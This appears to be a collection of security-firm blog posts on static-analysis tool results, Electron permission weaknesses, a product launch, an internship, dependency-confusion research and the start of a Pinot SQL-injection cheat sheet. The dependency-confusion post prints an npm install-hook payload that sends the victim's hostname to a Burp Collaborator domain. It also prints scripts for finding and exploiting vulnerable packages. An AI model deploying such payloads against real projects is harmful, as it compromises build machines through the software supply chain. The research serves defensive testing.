Client code results

This section discusses the results of using the tools to examine an open source Golang project for one of our clients.

In these tests, due to the aforementioned lack of a priori knowledge of the code’s true security status, we are forced to assume that all files without true positives are free from vulnerabilities and are therefore considered TNs, and likewise that there are no FNs. This underscores that testing against code that has already been organized for evaluation can be assumed to be more accurate.

Running Semgrep with the “r2c-security-audit” configuration resulted in 15 Golang findings, all of which were true positives. That said, the majority of the findings were related to the use of the unsafe library. Due to the nature of this issue, we opted to count it only as one finding per file, so as not to further skew the results by counting each usage within a file.

As shown in the table below, both tools performed very well! CodeQL detected significantly more findings, but it should be noted that they were largely the same couple of issues across numerous files. In other words, there were repeated code patterns in many cases, skewing the volume of findings.

For the purposes of this exercise, TN = Total .go files - TP (890-15) = 875, since we are assuming all those files are free of vulnerabilities. For the Semgrep case, the value is irrelevant for the rate calculations, since no false positives were found.
Semgrep in --config auto mode resulted in thousands of findings when run against our client’s code, as opposed to tens of findings when limiting the scans to security-specific tests on Golang only. We cite this, to underscore that results will vary greatly depending on the code tested and rules applied. That reduction in scope resulted in no false positives during manually reviewed results.
For CodeQL, approximately 25% of the files were not scanned, due to issues with the tool.
CodeQL encountered many errors during file compilation. 63 out of 74 Go files generated errors while being extracted to CodeQL’s database. This means that the analysis was performed on less data, and most files were only partially analyzed by CodeQL. This caused the CodeQL scan to result in significantly fewer findings than expected.
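
The counting approach described in the notes above (one finding per file, and TN derived from the total number of .go files) can be sketched as follows. The function and field names are assumptions made for this example. Subtracting false positives when deriving TN is also our assumption; it reduces to the TN = total - TP formula above when there are no false positives, as in the Semgrep case.

```javascript
// Collapse findings so that each (rule, file) pair is counted only once.
function dedupePerFile(findings) {
  const seen = new Set();
  return findings.filter(({ ruleId, file }) => {
    const key = `${ruleId}\u0000${file}`;
    if (seen.has(key)) return false;
    seen.add(key);
    return true;
  });
}

// Derive file-level counts under the assumption stated in the text:
// every file without a true positive is clean, so FN = 0.
function fileLevelCounts({ totalFiles, tp, fp = 0 }) {
  const tn = totalFiles - tp - fp;
  const fn = 0;
  const precision = tp + fp === 0 ? 0 : tp / (tp + fp);
  const fpr = fp + tn === 0 ? 0 : fp / (fp + tn);
  return { tp, fp, tn, fn, precision, fpr };
}

// Semgrep numbers quoted above: 890 .go files, 15 true positives,
// no false positives.
console.log(fileLevelCounts({ totalFiles: 890, tp: 15 }));
```

Because FN is assumed to be zero, rates derived this way are upper bounds on real-world performance rather than measured values.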

Conclusion

Obviously there could be some bias, but if you’d like another opinion, the creators of Semgrep have also provided a comparison with CodeQL on their website, particularly in this section: “How is Semgrep different from CodeQL?”.

Not surprisingly, in the end, we still feel Semgrep is a better tool for our use as a security consultancy boutique doing high-quality manual audits. This is because we don’t always have access to all the source code that we’d need to use CodeQL, and the process of setting up scans is more laborious and time consuming in CodeQL. Additionally, we can manually vet findings ourselves, so a few extra findings aren’t a major issue for us, and we can use Semgrep for free. If an organization’s use case is more aligned with our client’s - being an organization that is willing to invest the time and effort, is particularly sensitive to false positives (e.g. running a scan during CI/CD) and doesn’t mind paying for the licensing - CodeQL might be a better choice for them.

Diving Into Electron Web API Permissions

2022-09-27T00:00:00+02:00

Introduction

When a Chrome user opens a site on the Internet that requests a permission, Chrome displays a large prompt in the top left corner. The prompt remains visible on the page until the user interacts with it, reloads the page, or navigates away. The permission prompt has Block and Allow buttons, and an option to close it. On top of this, Chrome 98 displays the full prompt only if the permission was triggered “through a user gesture when interacting with the site itself”. These precautionary measures are the only things preventing a malicious site from using APIs that could affect user privacy or security.

Since Chrome implements this pop-up box, how does Electron handle permissions? From Electron’s documentation:

“In Electron the permission API is based on Chromium and implements the same types of permissions. By default, Electron will automatically approve all permission requests unless the developer has manually configured a custom handler. While a solid default, security-conscious developers might want to assume the very opposite.”

This approval can lead to serious security and privacy consequences if the renderer process of the Electron application were to be compromised via unsafe navigation (e.g., open redirect, clicking links) or cross-site scripting. We decided to investigate how Electron implements various permission checks to compare Electron’s behavior to that of Chrome and determine how a compromised renderer process may be able to abuse web APIs.

Webcam, Microphone, and Screen Recording Permissions

The webcam, microphone, and screen recording functionalities present a serious risk to users when approval is granted by default. Without implementing a permission handler, an Electron app’s renderer process will have access to a user’s webcam and microphone. However, screen recording requires the Electron app to have configured a source via a desktopCapturer in the main process. This leaves little room for exploitability from the renderer process, unless the application already needs to record a user’s screen.

Electron groups these three into one permission, “media”. In Chrome, these permissions are separate. Electron’s lack of separation between these three is problematic because there may be cases where an application only requires the microphone, for example, but must also be granted access to record video. By default, the application would not have the capability to deny access to video without also denying access to audio. For those wondering, modern Electron apps that seemingly handle microphone and video permissions separately are only tracking and respecting the user’s choices in their UI. An attacker with a compromised renderer could still access any media.

It is also possible for media devices to be enumerated even when permission has not been granted. In Chrome however, an origin can only see devices that it has permission to use. The API navigator.mediaDevices.enumerateDevices() will return all of the user’s media devices, which can be used to fingerprint the user’s devices. For example, we can see a label of “Default - MacBook Pro Microphone (Built-in)”, despite having a deny-all permission handler.

To deny access to all media devices (but not prevent enumerating the devices), a permission handler must be implemented in the main process that rejects requests for the “media” permission.

File System Access API

The File System Access API normally allows access to read and write to local files. In Electron, reading files has been implemented but writing to files has not been implemented and permission to write to files is always denied. However, access to read files is always granted when a user selects a file or directory. In Chrome, when a user selects a file or directory, Chrome notifies you that you are granting access to a specific file or directory until all tabs of that site are closed. In addition, Chrome prevents access to directories or files that are deemed too sensitive to disclose to a site. These are both considerations mentioned in the API’s standard (discussed by the WICG).

“User agents should try to make sure that users are aware of what exactly they’re giving websites access to” – implemented in Chrome with the notification after choosing a file or directory

“User agents are encouraged to restrict which directories a user is allowed to select in a directory picker, and potentially even restrict which files the user is allowed to select” – implemented in Chrome by preventing users from sharing certain directories containing system files.

In Electron, there is no such notification or prevention. A user is allowed to select their root directory or any other sensitive directory, potentially granting more access than intended to a website. There will be no notification alerting the user of the level of access they will be granting.

Clipboard, Notification, and Idle Detection APIs

For these three APIs, the renderer process is granted access by default. This means a compromised renderer process can read the clipboard, send desktop notifications, and detect when a user is idle.

Clipboard

Access to the user’s clipboard is extremely security-relevant because some users will copy passwords or other sensitive information to the clipboard. Normally, Chromium denies access to reading the clipboard unless it was triggered by a user’s action. However, we found that adding an event handler for the window’s load event would allow us to read the clipboard without user interaction.

To deny access to this API, deny access to the “clipboard-read” permission.

Notifications

Sending desktop notifications is another security-relevant feature because desktop notifications can be used to increase the success rate of phishing or other social engineering attempts.

To deny access to this API, deny access to the “notifications” permission.

Idle Detection

The Idle Detection API is much less security-relevant, but its abuse still represents a violation of user privacy.

To deny access to this API, deny access to the “idle-detection” permission.

Local Font Access API

For this API, the renderer process is granted access by default. Furthermore, the main process never receives a permission request. This means that a compromised renderer process can always read a user’s fonts. This behavior has significant privacy implications because the user’s local fonts can be used as a fingerprint for tracking purposes and they may even reveal that a user works for a specific company or organization. Yes, we do use custom fonts for our reports!

Security Hardening for Electron App Permissions

What can you do to reduce your Electron application’s risk? You can quickly assess if you are mitigating these issues and the effectiveness of your current mitigations using ElectroNG, the first SAST tool capable of rapid vulnerability detection and identifying missing hardening configurations. Among its many features, ElectroNG features a dedicated check designed to identify if your application is secure from permission-related abuses:

A secure application will usually deny all the permissions for dangerous web APIs by default. This can be achieved by adding a permission handler to a Session as follows:

  ses.setPermissionRequestHandler((webContents, permission, callback) => {
    return callback(false);
  })

If your application needs to allow the renderer process permission to access some web APIs, you can add exceptions by modifying the permission handler. We recommend checking if the origin requesting permission matches an expected origin. It’s a good practice to also set the permission request handler to null first to force any permission to be requested again. Without this, revoked permissions might still be available if they’ve already been used successfully.

session.defaultSession.setPermissionRequestHandler(null);

Conclusions

As we discussed, these permissions present significant risk to users even in Electron applications setting the most restrictive webPreferences settings. Because of this, it’s important for security teams & developers to strictly manage the permissions that Electron will automatically approve unless the developer has manually configured a custom handler.

ElectroNG, our premium SAST tool released!

2022-09-06T00:00:00+02:00

As promised in November 2021 at Hack In The Box #CyberWeek event in Abu Dhabi, we’re excited to announce that ElectroNG is now available for purchase at https://get-electrong.com/.

Our premium SAST tool for Electron applications is the result of many years of applied R&D! Doyensec has been the leader in Electron security since being the first security company to publish a comprehensive security overview of the Electron framework during BlackHat USA 2017. Since then, we have reported dozens of vulnerabilities in the framework itself and popular Electron-based applications.

A bit of history

We launched Electronegativity OSS at the beginning of 2019 as a set of scripts to aid the manual auditing of Electron apps. Since then, we’ve released numerous updates, educated developers on security best practices, and grown a strong community around Electron application security. Electronegativity is even mentioned in the official security documentation of the framework.

At the same time, Electron has established itself as the framework of choice for developing multi-OS desktop applications. It is now used by over a thousand public desktop applications and many more internal tools and custom utilities. Major tech companies are betting on this technology by devoting significant resources to it, and it is now evident that Electron is here to stay.

What’s new?

Considering the evolution of the framework and emerging threats, we quickly realized that Electronegativity needed a significant refresh, in terms of detection and features, to help modern companies in “building with security”.

At the end of 2020, we sat down to create a project roadmap and created a development team to work on what is now ElectroNG. In this blog post, we will highlight some of the major improvements over the OSS version. There is much more under the hood, and we will be covering more features in future posts and presentations.

User Interface

If you’ve ever used Electronegativity, it will be obvious that ElectroNG is no longer a command-line tool. Instead, we’ve built a modern desktop app (using Electron!).

Better Detection, More Checks

ElectroNG features a new decision mechanism to flag security issues based on improved HTML/JavaScript/TypeScript parsing and new heuristics. After developing that, we improved all existing atomic and conditional checks to reduce the number of false positives and improve accuracy. There are now over 50 checks to detect misconfigurations and security vulnerabilities!

However, the most significant improvement revolves around the creation of Electron-dependent checks. ElectroNG will attempt to determine the specific version of the framework in use by the application and dynamically adjust the scan results based on that. Considering that Electron APIs and options change very frequently, this boosts the tool’s reliability in determining things that matter.

To provide a concrete example to the reader, let’s consider a lesser-known setting named affinity. Electron v2 introduced a new BrowserView/BrowserWindow webPreferences option for gathering several windows into a single process. When specified, web pages loaded by BrowserView/BrowserWindow instances with the same affinity will run in the same renderer process. While this setting was meant to improve performance, it leads to unexpected results across different Electron versions.

Let’s consider the following code snippet:

function createWindow () {
  // Create the browser window.
  firstWin = new BrowserWindow({
    width: 800,
    height: 600,
    webPreferences: {
      nodeIntegration: true,
      affinity: "secPrefs"
    }
  })

  secondWin = new BrowserWindow({
    width: 800,
    height: 600,
    webPreferences: {
      nodeIntegration: false,
      affinity: "secPrefs"
    }
  })

  firstWin.loadFile('index.html')
  secondWin.loadFile('index.html')
}

Looking at the nodeIntegration setting defined by the two webPreferences definitions, one might expect the first BrowserWindow to have access to Node.js primitives while the second one to be isolated. This is not always the case and this inconsistency might leave an insecure BrowserWindow open to attackers.

The results across different Electron versions are surprising to say the least:

The affinity option has been fully deprecated in v14 as part of the Electron maintainers’ plan to more closely align with Chromium’s process model for security, performance, and maintainability. This example demonstrates two important things around renderers’ settings:

The specific Electron version in use determines which webPreferences are applicable and which aren’t
The semantics and security implications of some webPreferences change based on the specific version of the framework

Terms and Price

ElectroNG is available for online purchase at $688/year per user. Visit https://get-electrong.com/buy.html.

The license does not limit the number of projects, scans, or even installations as long as the software is installed on machines owned by a single individual person. If you’re a consultant, you can run ElectroNG for any number of applications, as long as you are running it and not your colleagues or clients. For bulk orders (over 50 licenses), contact us!

Electronegativity & ElectroNG

With the advent of ElectroNG, we have already received emails asking about the future of Electronegativity.

Electronegativity & ElectroNG will coexist. Doyensec will continue to support the OSS project as we have done for the past years. As usual, we look forward to external contributions in the form of pull requests, issues, and documentation.

ElectroNG’s development will focus on features that are important for paid customers, with the ultimate goal of providing an effective and easy-to-use security scanner for Electron apps. Having a team behind this new project will also bring innovation to Electronegativity, since bug fixes and features that are applicable to the OSS version will also be ported.

As successfully done in the past by other projects, we hope that the coexistence of a free community and paid versions of the tool will give users the flexibility to pick whatever fits best. Whether you’re an individual developer, a small consulting boutique, or a big enterprise, we believe that Electronegativity & ElectroNG can help eradicate security vulnerabilities from your Electron-based applications.

My Internship Experience at Doyensec

2022-08-24T00:00:00+02:00

Throughout the Summer of 2022, I worked as an intern for Doyensec. I’ll be describing my experience with Doyensec in this blog post so that other potential interns can decide if they would be interested in applying.

The Recruitment Process

The recruitment process began with a non-technical call about the internship to make introductions and exchange more information. Once everyone agreed it was a fit, we scheduled a technical challenge where I was given two hours to provide my responses. I enjoyed the challenge and did not find it to be a waste of time. After the technical challenge, I had two technical interviews with different people (Tony and John). I thought these went really well for questions about web security, but I didn’t know the answers to some questions about other areas of application security I was less familiar with. Since Doyensec performs assessments of non-web applications as well (mobile, desktop, etc.), it made sense that they would ask some questions about non-web topics. After the final call, I was provided with an offer via email.

The Work

As an intern, my time was divided between working on an internal training presentation, conducting research, and performing security assessments. Creating the training presentation allowed me to learn more about a technical topic that will probably be useful for me in the future, whether at Doyensec or not. I used some of my research time to learn about the topic and make the presentation. My presentation was on the advanced features of Semgrep, the open-source static code analysis tool. Doyensec often has cross-training sessions where members of the team demonstrate new tools and techniques, or just the latest “Best Bug” they found on an engagement.

Conducting research was a good experience as an intern because it allowed me to learn more about the research topic, which in my case was Electron and its implementation of web API permissions. Don’t worry too much about not having a good research topic of your own already – there are plenty of things that have already been selected as options, and you can ask for help choosing a topic if you’re not sure what to research. My research topic was originally someone else’s idea.

My favorite part of the internship was helping with security assessments. I was able to work as a normal consultant with some extra guidance. I learned a lot about different web frameworks and programming languages. I was able to see what technologies real companies are using and review real source code. For example, before the internship, I had very limited experience with applications written in Go, but now I feel mostly comfortable testing Go web applications. I also learned more about mobile applications, which I had limited experience with. In addition to learning, I was able to provide actionable findings to businesses to help reduce their risk. I found vulnerabilities of all severities and wrote reports for these with recommended remediation steps.

Should You Become an Intern?

When I was looking for an internship, I wanted to find a role that would let me learn a lot. Most of the other factors were low-priority for me because the role is temporary. If you really enjoy application security and want to learn more about it, this internship is a great way to do that. The people at Doyensec are very knowledgeable about a wide variety of application security topics, and are happy to share their knowledge with an intern.

Even though my priority was learning, it was also nice that the work is performed remotely and with flexible hours. I found that some days I preferred to stop work at around 2-3 PM and then continue at night. I think these conditions are desirable to anyone, not just interns.

As for qualifications, Doyensec has stated that the ideal candidate:

Already has some experience with manual source code review and Burp Suite / OWASP ZAP
Learns quickly
Should be able to prepare reports in English
Is self-organized
Is able to learn from his/her mistakes
Has motivation to work/study and show initiative
Must be communicative (without this it is difficult to teach effectively)
Brings something to the mix (e.g., creativity, academic knowledge, etc.)

My experience before the internship consisted mostly of bug bounty hunting and CTFs. There are not many other opportunities for college students with zero experience, so I had spent nearly two years bug hunting part-time before the internship. I also had the OSWE certification to demonstrate capability for source code review, but this is definitely not required (they’ll test you anyway!). Simply being an active participant in CTFs with a focus on web security and code review may be enough experience. You may also have some other way of learning about web security if you don’t usually participate in CTFs.

Final Thoughts

I enjoyed my internship at Doyensec. There was a good balance between learning and responsibility that has prepared me to work in an application security role at Doyensec or elsewhere.

Dependency Confusion

2022-07-21T00:00:00+02:00

On Feb 9th, 2022 PortSwigger announced Alex Birsan’s Dependency Confusion as the winner of the Top 10 web hacking techniques of 2021. Over the past year this technique has gained a lot of attention. Despite that, in-depth information about hunting for and mitigating this vulnerability is scarce.

I have always believed the best way to understand something is to get hands-on experience. In the following post, I’ll show the results of my research that focused on creating an all-around tool (named Confuser) to test and exploit potential Dependency Confusion vulnerabilities in the wild. To validate the effectiveness, we looked for potential Dependency Confusion vulnerabilities in top ElectronJS applications on Github (spoiler: it wasn’t a great idea!).

The tool has helped Doyensec during engagements to ensure that our clients are safe from this threat, and we believe it can facilitate testing for researchers and blue-teams too.

So… what is Dependency Confusion?

Dependency confusion is an attack against the build process of the application. It occurs as a result of a misconfiguration of the private dependency repositories. Vulnerable configurations allow downloading versions of local packages from a main public repository (e.g., registry.npmjs.com for NPM). When a private package is registered only in a local repository, an attacker can upload a malicious package to the main repository with the same name and a higher version number. When a victim updates their packages, the malicious code will be downloaded and executed on a build or developer machine.
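To make the mechanics concrete, here is a minimal sketch in Python of a resolver that simply prefers the highest version it can see across all configured registries. It is a deliberately simplified model, not NPM's actual resolution logic: it ignores semver ranges and registry configuration, and the package name `internal-lib` and the registry contents are made up for illustration.

```python
def parse_version(version):
    """Turn '1.0.1' into (1, 0, 1) so versions compare numerically."""
    return tuple(int(part) for part in version.split("."))


def resolve(package_name, registries):
    """Pick the highest version offered by any registry (simplified model)."""
    candidates = []
    for registry_name, packages in registries.items():
        for version in packages.get(package_name, []):
            candidates.append((parse_version(version), registry_name, version))
    if not candidates:
        return None
    _, registry_name, version = max(candidates)
    return registry_name, version


# Hypothetical data: the private registry hosts the real package,
# while an attacker has published a higher version publicly.
private_registry = {"internal-lib": ["1.0.0", "1.0.1"]}
public_registry = {"internal-lib": ["99.0.0"]}

winner = resolve(
    "internal-lib",
    {"private": private_registry, "public": public_registry},
)
print(winner)
```

In this model the public copy wins purely because of its version number, which is the core of the attack.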

Why is it so hard to study Dependency Confusion?

There are multiple reasons why, despite all the attention, Dependency Confusion seems to be so unexplored.

There are plenty of dependency management systems

Each programming language utilizes different package management tools, most with their own repositories. Many languages have multiple of them. JavaScript alone has NPM, Yarn and Bower to name a few. Each tool comes with its own ecosystem of repositories, tools, options for local package hosting (or lack thereof). It is a significant time cost to include another repository system when working with projects utilizing different technology stacks.

In my research I have decided to focus on the NPM ecosystem. The main reason for that is its popularity. It’s a leading package management system for JavaScript and my secondary goal was to test ElectronJS applications for this vulnerability. Focusing on NPM would guarantee coverage on most of the target applications.

Actual exploitation requires interaction with 3rd party services

In order to exploit this vulnerability, the researcher needs to upload a malicious package to a public repository. Rightly so, most repositories actively work against such practices. On NPM, malicious packages are flagged and removed, and the owner account is banned.

During the research, I was interested in observing how much time an attacker has before their payload is removed from the repository. Additionally, NPM is not actually a target of the attack, so among my goals was to minimize the impact on the platform itself and its users.

Reliable information extraction from targets is hard

In the case of a successful exploitation, a target machine is often a build machine inside a victim organization’s network. While it is a great reason why this attack is so dangerous, extracting information from such a network is not always an easy task.

In his original research, Alex proposes a DNS exfiltration technique to extract information from attacked machines. This is the technique I decided to use too. It requires a small infrastructure with a custom DNS server, unlike most web exploitation attacks, where an HTTP proxy or a browser is often enough. This highlights why building tools such as mine is essential if the community is to hunt these bugs reliably.

The tool

So, how to deal with those problems? I have decided to try and create Confuser - a tool that attempts to solve the aforementioned issues.

The tool is OSS and available at https://github.com/doyensec/confuser.

Be respectful and don’t create problems for our friends at NPM!

The process

Researching any Dependency Confusion vulnerability consists of three steps.

Step 1) Reconnaissance

Finding Dependency Confusion bugs requires a package file that contains a list of application dependencies. In the case of projects utilizing NPM, the package.json file holds such information:

{
  "name": "Doyensec-Example-Project",
  "version": "1.0.0",
  "description": "This is an example package. It uses two dependencies: one is a public one named axios. The other one is a package hosted in a local repository named doyensec-library.",
  "main": "index.js",
  "author": "Doyensec LLC <info@doyensec.com>",
  "license": "ISC",
  "dependencies": {
    "axios": "^0.25.0",
    "doyensec-local-library": "~1.0.1",
    "another-doyensec-lib": "~2.3.0"
  }
}

When a researcher finds a package.json file, their first task is to identify potentially vulnerable packages. That means packages that are not available in the public repository. The process of verifying the existence of a package seems pretty straightforward. Only one HTTP request is required. If a response status code is anything but 200, the package probably does not exist:

import requests

NPM_ADDRESS = "https://www.npmjs.com/"  # assumed base URL; not given in the original

def check_package_exists(package_name):
    response = requests.get(NPM_ADDRESS + "package/" + package_name, allow_redirects=False)
    return response.status_code == 200

Simple? Well… almost. NPM also allows scoped package names formatted as follows: @scope-name/package-name. In this case, a package can be a target for Dependency Confusion if an attacker can register a scope with the given name. This can also be verified by querying NPM:

def check_scope_exists(package_name):
    split_package_name = package_name.split('/')
    scope_name = split_package_name[0][1:]
    response = requests.get(NPM_ADDRESS + "~" + scope_name, allow_redirects=False)

    return (response.status_code == 200)

The tool I have built allows the streamlining of this process. A researcher can upload a package.json file to my web application. In the backend, the file will be parsed, and have its dependencies iterated. As a result, a researcher receives a clear table with potentially vulnerable packages and the versions for a given project:

The downside of this method is that it requires enumerating the NPM service and sending dozens of HTTP requests per project. In order to ease the strain put on the service, I have decided to implement a local cache. Any package name that has once been identified as existing in the NPM registry is saved in the local database and skipped during subsequent scans. Thanks to that, there is no need to repeatedly query the same packages. After scanning about 50 package.json files scraped from Github, I have estimated that the caching has decreased the number of required requests by over 40%.
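The scan-and-cache idea described above can be sketched roughly as follows. This is not Confuser's actual code: the class name, table name and the `exists_remotely` callback are assumptions made for illustration, and the network lookup is replaced by a fake function so the example runs offline. As in the description, only names confirmed to exist publicly are cached.

```python
import json
import sqlite3


class ExistingPackageCache:
    """Remembers package names already confirmed to exist publicly."""

    def __init__(self, db_path=":memory:"):
        self.db = sqlite3.connect(db_path)
        self.db.execute(
            "CREATE TABLE IF NOT EXISTS existing_packages (name TEXT PRIMARY KEY)"
        )

    def contains(self, name):
        row = self.db.execute(
            "SELECT 1 FROM existing_packages WHERE name = ?", (name,)
        ).fetchone()
        return row is not None

    def add(self, name):
        self.db.execute(
            "INSERT OR IGNORE INTO existing_packages (name) VALUES (?)", (name,)
        )
        self.db.commit()


def find_missing_packages(package_json_text, exists_remotely, cache):
    """Return {name: version_spec} for dependencies not found publicly."""
    manifest = json.loads(package_json_text)
    missing = {}
    for name, version_spec in manifest.get("dependencies", {}).items():
        if cache.contains(name):
            continue  # already known to exist, no request needed
        if exists_remotely(name):
            cache.add(name)
        else:
            missing[name] = version_spec
    return missing


# Fake lookup standing in for an HTTP check; records every "request".
requests_made = []

def fake_lookup(name):
    requests_made.append(name)
    return name == "axios"

cache = ExistingPackageCache()
manifest = '{"dependencies": {"axios": "^0.25.0", "doyensec-local-library": "~1.0.1"}}'
first_scan = find_missing_packages(manifest, fake_lookup, cache)
second_scan = find_missing_packages(manifest, fake_lookup, cache)
print(first_scan, requests_made)
```

On the second scan the public package is served from the cache, so only the candidate package triggers another lookup.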

Step 2) Payload generation and upload

Successful exploitation of a Dependency Confusion vulnerability requires a package that will call home after it has been installed by the victim. In the case of NPM, the easiest way to do this is by exploiting install hooks. NPM packages allow hooks that run each time a given package is installed. Such functionality is the perfect place for a dependency payload to be triggered. The package.json template I used looks like the following:

{
  "name": {package_name},
  "version": {package_version},
  "description": "This package is a proof of concept used by Doyensec LLC to conduct research. It has been uploaded for test purposes only. Its only function is to confirm the installation of the package on a victim's machines. The code is not malicious in any way and will be deleted after the research survey has been concluded. Doyensec LLC does not accept any liability for any direct, indirect, or consequential loss or damage arising from the use of, or reliance on, this package.",
  "main": "index.js",
  "author": "Doyensec LLC <info@doyensec.com>",
  "license": "ISC",
  "dependencies": { },
  "scripts": {
    "install": "node extract.js {project_id}"
  }
}

Please note the description that informs users and maintainers about the purpose of the package. It is an attempt to distinguish the package from a malicious one, and it serves to inform both NPM and potential victims about the nature of the operation.

The install hook runs the extract.js file which attempts to extract minimal data about the machine it has been run on:

const https = require('https');
var os = require("os");
var hostname = os.hostname();

const data = new TextEncoder().encode(
  JSON.stringify({
    payload: hostname,
    project_id: process.argv[2]
  })
);

const options = {
  hostname: process.argv[2] + '.' + hostname + '.jylzi8mxby9i6hj8plrj0i6v9mff34.burpcollaborator.net',
  port: 443,
  path: '/',
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Content-Length': data.length
  },
  rejectUnauthorized: false
}

const req = https.request(options, res => {});
req.write(data);
req.end();

I’ve decided to save time on implementing a fake DNS server and use the existing infrastructure provided by Burp Collaborator. The file will use a given project’s ID and victim’s hostname as subdomains and try to send an HTTP request to the Burp Collaborator domain. This way my tool will be able to assign callbacks to proper projects along with the victims’ hostnames.
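On the receiving side, the hostname layout used by the payload (project ID, then victim hostname, then the Collaborator domain) has to be split back apart. A minimal sketch of that step in Python, assuming the queried hostname is available as a string; the function name and the `abc123.burpcollaborator.net` domain are placeholders, not values used by Confuser:

```python
def parse_callback_host(queried_host, collaborator_domain):
    """Split '<project_id>.<victim_hostname>.<collaborator_domain>'."""
    suffix = "." + collaborator_domain.lower()
    host = queried_host.lower().rstrip(".")
    if not host.endswith(suffix):
        return None  # not one of our callbacks
    prefix = host[: -len(suffix)]
    # The first label is the project ID; the rest is the victim hostname,
    # which may itself contain dots.
    project_id, separator, victim_hostname = prefix.partition(".")
    if not separator or not project_id or not victim_hostname:
        return None
    return {"project_id": project_id, "victim_hostname": victim_hostname}


callback = parse_callback_host(
    "42.build-01.abc123.burpcollaborator.net",
    "abc123.burpcollaborator.net",
)
print(callback)
```

Splitting on the first dot only keeps multi-label hostnames such as `ci.corp.local` intact.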

After the payload generation, the package is published to the public NPM repository using the npm command itself: npm publish.

Step 3) Callback aggregation

The final step in the chain is receiving and aggregating the callbacks. As stated before, I have decided to use the Burp Collaborator infrastructure. To be able to download callbacks to my backend, I have implemented a simple Burp Collaborator client in Python:

import json
import requests

class BurpCollaboratorClient():

    BURP_DOMAIN = "polling.burpcollaborator.net"

    def __init__(self, colabo_key, colabo_subdomain):
        self.colabo_key = colabo_key
        self.colabo_subdomain = colabo_subdomain

    def poll(self):
        params = {"biid": self.colabo_key}
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"}

        response = requests.get(
            "https://" + self.BURP_DOMAIN + "/burpresults", params=params, headers=headers)#, proxies=PROXIES, verify=False)

        if response.status_code != 200:
            raise Exception("Failed to poll Burp Collaborator")

        result_parsed = json.loads(response.text)
        return result_parsed.get("responses", [])

After polling, the returned callbacks are parsed and assigned to the proper projects. For example, if anyone runs npm install on the example project I have shown before, it’ll render the following callbacks in the application:

Test run

To validate the effectiveness of Confuser, we decided to test Github’s top 50 ElectronJS applications.

I have extracted a list of Electron Applications from the official ElectronJS repository available here. Then, I used the Github API to sort the repositories by the number of stars. For the top 50, I have scraped the package.json files.

This is the Node script to scrape the files:

// Assumes this runs inside an async function with octokit, fs and repos already set up.
// Walk the star-sorted list until 50 package.json files have been saved.
let saved = 0;
for (let i = 0; saved < 50 && i < repos.length; i++) {
    const repo = repos[i]
    await octokit
      .request("GET /repos/" + repo.repo + "/commits?per_page=1", {})
      .then((response) => {
        // Use the newest commit to list every file in the repository.
        const sha = response.data[0].sha
        return octokit.request("GET /repos/" + repo.repo + "/git/trees/:sha?recursive=1", {
          "sha": sha
        });
      })
      .then((response) => {
        // Fetch the first file whose path ends with package.json.
        for (const file of response.data.tree) {
          if (file.path.endsWith("package.json")) {
            return octokit.request("GET /repos/" + repo.repo + "/git/blobs/:sha", {
              "sha": file.sha
            });
          }
        }

        return null;
      })
      .then((response) => {
        // Repositories without a package.json are skipped and not counted.
        if (!response) return null;
        saved++;
        const package_json = Buffer.from(response.data.content, 'base64').toString('utf-8');
        const repoNameSplit = repo.repo.split('/');
        return fs.writeFileSync("package_jsons/" + repoNameSplit[0]+ '_' + repoNameSplit[1] + ".json", package_json);
      });
  }

The script takes the newest commit from each repo and then recursively searches its files for any named package.json. Such files are downloaded and saved locally.

After downloading those files, I uploaded them to the Confuser tool. It resulted in scanning almost 3k dependency packages. Unfortunately, only one application had some potential targets. As it turned out, it was taken from an archived repository, so despite having a “malicious” package in the NPM repository for over 24h (after which it was removed by NPM), I received no callbacks from the victim. I did receive a few callbacks from some machines that seemed to have downloaded the application for analysis. This also highlighted a problem with my payload: getting only the hostname of the victim might not be enough to distinguish an actual victim from false positives. A more accurate payload might involve collecting information such as local paths and local users, which raises privacy concerns.

Example false positives:

In hindsight, it was a pretty naive approach to scrape package.json files from public repositories. Open Source projects most likely use only public dependencies and don’t rely on any private infrastructure. On the last day of my research, I downloaded a few closed source Electron apps. Unpacking them, I was able to extract the package.json in many cases, but none yielded any interesting results.

Summary

We’re releasing Confuser - a newly created tool to find and test for Dependency Confusion vulnerabilities. It allows scanning package.json files, generating and publishing payloads to the NPM repository, and finally aggregating the callbacks from vulnerable targets.

This research has allowed me to greatly increase my understanding of the nature of this vulnerability and the methods of exploitation. The tool has been sufficiently tested to work well during Doyensec’s engagements. That said, there are still many improvements that can be made in this area:

Implement its own DNS server or at least integrate with Burp’s self-hosted Collaborator server instances
Add support for other languages and repositories

Additionally, there seem to be several research opportunities in the realm of Dependency Confusion vulnerabilities:

It seems promising to expand the research to closed-source ElectronJS applications. While high profile targets like Microsoft will probably have their bases covered in that regard (also because they were targeted by the original research), there might be many more applications that are still vulnerable
Researching other dependency management platforms. The original research touches on NPM, Ruby Gems, Python’s PIP, JFrog and Azure Artifacts. It is very likely that similar problems exist in other environments

Apache Pinot SQLi and RCE Cheat Sheet

2022-06-09T00:00:00+02:00

The database platform Apache Pinot has been growing in popularity. Let’s attack it!

This article will help pentesters use their familiarity with classic database systems such as Postgres and MariaDB, and apply it to Pinot. In this post, we will show how a classic SQL-injection (SQLi) bug in a Pinot-backed API can be escalated to Remote Code Execution (RCE) and then discuss post-exploitation.

What Is Pinot?
Essential Architectural Details
Setting Up a Test Environment
Pinot SQL Syntax & Injection Basics
- String Matching
- Query Options
  - CTF-grade SQL injection
Timeouts
SQL Injection in Pinot
RCE via Groovy
- RCE Example Queries
Use RCE on Server to Attack Other Nodes
TLDR

What Is Pinot?

Pinot is a real-time distributed OLAP datastore, purpose-built to provide ultra low-latency analytics, even at extremely high throughput.

Huh? If it helps, most articles try to explain OLAP (OnLine Analytical Processing) by showing a diagram of your 2D database table turning into a cube, but for our purposes we can ignore all the jargon.

Apache Pinot is a database system which is tuned for analytics queries (Business Intelligence) where:

data is being streamed in, and needs to be instantly queryable
many users need to perform complicated queries at the same time
the queries need to quickly aggregate or filter terabytes of data

Pinot was started in 2013 at LinkedIn, where it now

powers some of LinkedIn’s more recognisable experiences such as Who Viewed My Profile, Job, Publisher Analytics, […] Pinot also powers LinkedIn’s internal reporting platform…

Pinot is unlikely to be used for storing a fairly static table of user emails and password hashes. It is more likely to be found ingesting a stream of orders or user actions from Kafka for analysis via an internal dashboard. Takeaway delivery platform UberEats gives all restaurants access to a Pinot-powered dashboard which

